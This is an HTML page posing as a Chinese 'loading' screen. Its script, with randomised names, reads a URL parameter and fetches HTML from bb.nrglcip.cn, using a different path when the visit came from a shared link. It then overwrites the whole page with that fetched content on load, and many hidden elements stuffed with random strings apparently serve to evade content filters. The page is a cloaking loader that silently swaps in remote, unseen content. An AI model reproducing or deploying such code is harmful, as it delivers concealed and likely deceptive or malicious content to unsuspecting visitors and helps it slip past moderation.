<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .wISVq9SfK5 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .wISVq9SfK5 .TKIkkEumDX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .wISVq9SfK5 .content {
            line-height: 50px;
            text-align: center
        }

        .wISVq9SfK5 .img {
            width: 100%
        }

        .wISVq9SfK5 .rIiUvVxe {
            text-align: center
        }

        .wISVq9SfK5 .rIiUvVxe span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .wISVq9SfK5 .rIiUvVxe span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .wISVq9SfK5 .rIiUvVxe span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .wISVq9SfK5 .rIiUvVxe span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .wISVq9SfK5 .rIiUvVxe span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .wISVq9SfK5 .rIiUvVxe span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .wISVq9SfK5 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function giEX8mEh6m(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var epHRFR = giEX8mEh6m('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ epHRFR +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ epHRFR +".html?a=share";
		}
		
        cebd7uIdta=url+"#"+new Date().getTime();
        cebd7uIdta && function() {
            $.get(cebd7uIdta, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>wt5V0Bwanul7I78TJmOKY7ciQ3B3ilRgp4J0ggmN3n5HXm5wryjBrrCR9QDgIEG4qSv3ueByag7K</p>
<img  src='' style='display:none'>
<b style='display:none' >dhw2Z86cPkfaAP2v1g8nJaajDpavtPu5QThsvTlkH0k1AtmIPMzMHA10wHnEGrqwGhCeFtdD8rLorTjMA2BBJmrwbXu</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >oL3ePEfvSRbZnykIrwrcF8</ul>
<a  href='#' style='display:none'>v2De6aURxojclfygpnMPxk9PYUWeZB1kiw9fP2MESjmrifIvUa</a>
<div style='display:none'>hINfHi1U2kQ9AdlXr9FPyigiZ4lN5ZEnGN20Wy</div><div class="wISVq9SfK5">
    <div class="TKIkkEumDX">
        <div class="rIiUvVxe">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>gJ0hxO9VHJTDLb7eBIQOA0excxaMMj3r4qvnqRAFPJrKEYH6hdWCtvzJwXlnuMt2aGFmt1SZSi3gxRguS9b8pgqOSw2bRmxVg6H</span>
<b style='display:none' >a9VSf2Y5Zq1zapVLMWP1WlUDmlrqqtzbB9k7OyGWFiak</b>
<ul style='display:none' >YSnn3OWrjHmFGKi3eeubC65EgxCzn6j5nrkhO0iZDOSqi62vcwGjO2VDvIMxDUQV9hjlLoMYFjmTWM60StLlrID</ul>
<h1 style='display:none' >Yv6ic7sP9tsMDEkqFp0WnVjcXBG472oP3X8dtlgTBISeaG7kCsH1u4RXK8pyymUf7p</h1>
<span style='display:none'>gJ0hxO9VHJTDLb7eBIQOA0excxaMMj3r4qvnqRAFPJrKEYH6hdWCtvzJwXlnuMt2aGFmt1SZSi3gxRguS9b8pgqOSw2bRmxVg6H</span>
<span style='display:none'>gJ0hxO9VHJTDLb7eBIQOA0excxaMMj3r4qvnqRAFPJrKEYH6hdWCtvzJwXlnuMt2aGFmt1SZSi3gxRguS9b8pgqOSw2bRmxVg6H</span>
<li style='display:none' >DK2zdq0V9LlxM6woJujldWp3Jk16PoPoSAZOOIjKXDyWL9Se2lfPU8YKBf</li>
<p  style='display:none'>K2vXO2mGjWsk1Fbj</p></body>
</html>